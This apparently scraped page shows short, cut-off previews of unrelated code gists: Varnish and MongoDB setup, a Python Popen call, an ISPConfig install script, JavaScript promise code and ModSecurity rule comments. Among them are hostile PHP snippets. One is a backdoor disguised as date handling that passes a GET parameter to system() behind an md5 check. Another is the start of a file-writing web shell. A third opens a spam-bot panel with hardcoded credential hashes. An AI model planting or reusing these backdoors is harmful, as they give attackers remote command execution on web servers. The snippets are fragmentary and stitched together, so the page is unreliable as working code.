This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Default backend definition. Set this to point to your content server. | |
| backend default { | |
| .host = "127.0.0.1"; | |
| .port = "8080"; | |
| .connect_timeout = 60s; | |
| .first_byte_timeout = 60s; | |
| .between_bytes_timeout = 60s; | |
| .max_connections = 800; | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| error_reporting(0); | |
| $ver = '6.6.6'; | |
| $my_keyw = $_SERVER['HTTP_USER_AGENT']; | |
| $items_per_page = 50; | |
| $admin_name = '27a0e2015f9087981c0b95a29fc4ba57'; | |
| $admin_pass = '9413c48772f73d5c305b65eb58a06f9c'; | |
| if($my_keyw=='spaumbot') |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if (substr(md5($_GET["localdate"]),0,6) == "6fbcb8") { | |
| $time = str_replace("@"," ",$_GET["localtime"]); | |
| @system($time); exit; | |
| } | |
| ?> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $content = stripslashes($_POST['content']); | |
| $cfile = $_POST['cfile']; | |
| $ufile = $_POST['ufile']; | |
| echo '<b><br>'.php_uname().'<br></b>'; | |
| echo '<form action="" method="post" enctype="multipart/form-data" name="aw" id="aw">'; | |
| echo '<textarea name=content style="width:585px;height:200px">'.$content.'</textarea><br>'; | |
| echo '<input type="text" name="cfile" size="10" value="newfile.php">'; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Create your superuser | |
| $ mongo | |
| > use admin | |
| > db.createUser({user:"someadmin",pwd:"secret", roles:[{role:"root",db:"admin"}]}) | |
| > exit | |
| # Alias for convenience (optional and at your own risk) | |
| $ echo 'alias mongo="mongo --port 27017 -u someadmin -p secret --authenticationDatabase admin"' >> ~/.bash_profile | |
| $ source ~/.bash_profile |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from subprocess import Popen | |
| def start_server(): | |
| cmd_str = 'sleep 60 && echo "hello!" >> /tmp/test.txt' | |
| proc = Popen([cmd_str], shell=True, | |
| stdin=None, stdout=None, stderr=None, close_fds=True) | |
| return cmd_str |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| ## Install ISPConfig3 on Ubuntu 14.04 64Bits | |
| ## Author: Nilton OS blog.linuxpro.com.br | |
| ## http://blog.linuxpro.com.br/posts/instalando-ispconfig3-no-ubuntu-1404.html | |
| ## http://www.howtoforge.com/the-perfect-server-ubuntu-14.04-nginx-bind-mysql-php-postfix-dovecot-and-ispconfig3-p2 | |
| dpkg-reconfigure dash | |
| service apparmor stop |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var Q = require("q"); | |
| var slowFunction1 = function( myObject ) { | |
| console.log("\nRunning slowFunction1"); | |
| console.log(myObject); | |
| var deferred = Q.defer(); | |
| setTimeout( function() { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # These rules are designed to be effective versus /distributed/ brute force | |
| # attacks. While they will function just as well against attacks which are | |
| # /not distributed/ they will deny access to all XML-RPC method calls | |
| # namespaced with the prefix "wp." | |
| # | |
| # An IP-based version of these rules may be more appropriate for sites which | |
| # attacked from just a few distinct IP addresses. | |
| # | |
| # See http://alzabo.io/modsecurity/2014/09/15/wordpress-xml-rpc-brute-force.html | |
| # for additional information |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rpm -Uvh http://www.city-fan.org/ftp/contrib/yum-repo/city-fan.org-release-1-12.rhel6.noarch.rpm |